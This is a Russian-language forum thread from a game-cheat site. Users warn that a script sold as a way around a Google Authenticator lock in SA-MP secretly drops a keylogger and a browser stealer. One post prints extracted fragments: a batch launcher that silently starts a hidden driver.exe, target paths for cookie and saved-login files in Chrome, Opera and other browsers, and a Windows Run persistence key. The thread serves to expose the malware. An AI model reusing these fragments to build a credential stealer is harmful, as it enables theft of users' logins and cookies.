СКРИПТ ДЛЯ ОТВЯЗКИ ПРИВЯЗОК (google authenticator)
|
|
[CM]KAZAKHSTAN |
Дата: Среда, 28.06.2017, 09:30 | Сообщение # 16
|
My from, KAZAKHSTAN!
Сообщений: 290
Статус: Offline
|
отпиши в ВК если не сложно, пару вопросов хочу задать.
http://vk.com/zharashev
ЛИДЕР МАФИИ [ФУЛЛ БИЗНЕСЫ] ll 12-13 ранг в ГОС 08 сервер! http://cheat-master.ru/forum/96-491090-1
|
|
|
|
Jeffwood |
Дата: Среда, 28.06.2017, 09:47 | Сообщение # 17
|
Новичок
Сообщений: 3
Статус: Offline
|
ну привет,решил проверить твой скрипт.дай бог лог !0antistealerbydarkp1xel,да ещё пару антистиллероских прог ,пролил на тебя свет дорогой ты наш хакер ))
http://imgur.com/a/wwNpe
http://imgur.com/a/K74sU и ребята сами думайте что делать дальше )
|
|
|
|
[CM]SeveN[Tawer] |
Дата: Среда, 28.06.2017, 11:09 | Сообщение # 18
|
Новичок
Сообщений: 12
Статус: Offline
|
Jeffwood, ну и что это?! Ты взял какие-то левые файлы , которые не причастны к этому скрипту! И показываешь , что я ст**лер залил?
[url='https://vk.com/damonx'][img]https://i.imgur.com/9gF7zX3.jpg[/img][/url][url='http://cheat-master.ru/index/8-465304'][img]https://i.imgur.com/L0c5cva.jpg[/img][/url]
|
|
|
|
zelengur |
Дата: Среда, 28.06.2017, 11:39 | Сообщение # 19
|
Боец
Сообщений: 121
Статус: Offline
|
dell
Сообщение отредактировал zelengur - Среда, 28.06.2017, 11:49 |
|
|
|
Jeffwood |
Дата: Среда, 28.06.2017, 11:45 | Сообщение # 20
|
Новичок
Сообщений: 3
Статус: Offline
|
Цитата [CM]SeveN[Tawer] ( ) ну и что это?! Ты взял какие-то левые файлы , которые не причастны к этому скрипту! И показываешь , что я ст**лер залил? Эм... щас бы тебя подставлять, я проста закину файл ошарашен в корень игры и как авторизовался (Кстати он не всё отключил ,отключил лишь pin code ,а остальное не трогал),решил посмотреть лог и увидел ,что твой стиллер качает/создаёт три файла,один из них стиллер карабашки ,второй вообще хз зачем,а третий samp.exe , на который ругается тот же касперский с причиной троян. Вот это я был ошарашен. Все мы знаем,что на CM нечего не чекают... а тут хайповая тема ОБХОД ГУГЛА !!!!! так что не грех стиллер вшить туда (даже скорее не стиллер ,а загрузчик ) Я хоть и выкладывал на другой портал обход(FIX) ,его видимо доработали я хз. Я проста кинул это всё,чтобы люди решали качать ли этот ОБХОД. НО заметь эти файлы скачал твой скрипт ...Добавлено (28.06.2017, 11:45) ---------------------------------------------
Цитата zelengur ( ) AppData\Roaming\driver\driver.exe = в скрытом аттрибуте. // кейлоггер.
Скажи пожалуйста, это создаётся ,если запустить samp.exe ? и исходники какого файла ты взял,проста по данному пути я не нашёл нечего,хотя запускал данный скрипт
|
|
|
|
zelengur |
Дата: Среда, 28.06.2017, 11:46 | Сообщение # 21
|
Боец
Сообщений: 121
Статус: Offline
|
Цитата jeffwood ( ) эм... щас бы тебя подставлять, я проста закину файл ошарашен в корень игры и как авторизовался (кстати он не всё отключил ,отключил лишь pin code ,а остальное не трогал),решил посмотреть лог и увидел ,что твой стиллер качает/создаёт три файла,один из них стиллер карабашки ,второй вообще хз зачем,а третий samp.exe , на который ругается тот же касперский с причиной троян. вот это я был ошарашен. все мы знаем,что на cm нечего не чекают... а тут хайповая тема обход гугла !!!!! так что не грех стиллер вшить туда (даже скорее не стиллер ,а загрузчик ) я хоть и выкладывал на другой портал обход(fix) ,его видимо доработали я хз. я проста кинул это всё,чтобы люди решали качать ли этот обход. но заметь эти файлы скачал твой скрипт ...
Забей, не пиши ничего. он как владелец дропера будет прыгать как куртизанка по бананам, и отрицать это) Да, Mr.Alex?
Сообщение отредактировал zelengur - Среда, 28.06.2017, 11:47 |
|
|
|
Jeffwood |
Дата: Среда, 28.06.2017, 11:48 | Сообщение # 22
|
Новичок
Сообщений: 3
Статус: Offline
|
Цитата zelengur ( ) и еще что-то, но это не важно. Дропается ещё файл(g20tgl.tmp) на диск D - этот файл является стиллером карабшки (ну показывал AVP)
|
|
|
|
zelengur |
Дата: Среда, 28.06.2017, 11:49 | Сообщение # 23
|
Боец
Сообщений: 121
Статус: Offline
|
Цитата Jeffwood ( ) Дропается ещё файл(g20tgl.tmp) на диск D - этот файл является стиллером карабшки (ну показывал AVP)
самое основное я выделил, так как у тебя стоит антистиллер от кого-то там, он не дал запустить samp.exe - который и является кейлогерром:
Оставлять открытый код... Сверхразум.
После запуска скрипта у вас в папке в которой инжектился скрипт, дропается: ptzaPvKR.tmp ||| "gta"/data/samp.exe и еще что-то, но это не важно.
Создается {12 random string}.bat
Код @echo off chcp 65001 echo DONT CLOSE THIS WINDOW! ping -n 10 localhost > nul start "" "C:\Users\*****\AppData\Roaming\driver\driver.exe" del /a /q /f "D:\Temp\N8mG6kqpqJ6F.bat"
AppData\Roaming\driver\driver.exe = в скрытом аттрибуте. // кейлоггер.
Код \\Browser\\User Data\\Default\\Cookies \\Browser\\User Data\\Default\\Login Data Amigo\\User Data\\Default\\Cookies Amigo\\User Data\\Default\\Login Data Amigo\User Data\Default\Cookies Google\\Chrome\\User Data\\Default\\Cookies Google\\Chrome\\User Data\\Default\\Login Data Kometa\\User Data\\Default\\Cookies Kometa\\User Data\\Default\\Login Data Orbitum\\User Data\\Default\\Cookies Orbitum\\User Data\\Default\\Login Data Opera Software\\Opera Stable\\Cookies Opera Software\\Opera Stable\\Login Data Opera Software\Opera Stable\Cookies Opera Software\Opera Stable\Login Data UCBrowser\\User Data_i18n\\Default\\Cookies.9 UCBrowser\\User Data_i18n\\Default\\UC Login Data.17 Vivaldi\\User Data\\Default\\Cookies Vivaldi\\User Data\\Default\\Login Data owser\Browser\User Data\Default\Cookies eta\User Data\Default\Cookies ault\Login Data 8n\Default\Cookies.9 Domain: {1}{0}Cookie Name: {2}{0}Value: {3}{0}Path: {4}{0}Expired: {5}{0}HttpOnly: {6}{0}Secure: {7}
\Wow6432Node\Microsoft\Windows\CurrentVersion\Run
Windows Defender - бл**)ть))0
|
|
|
|
|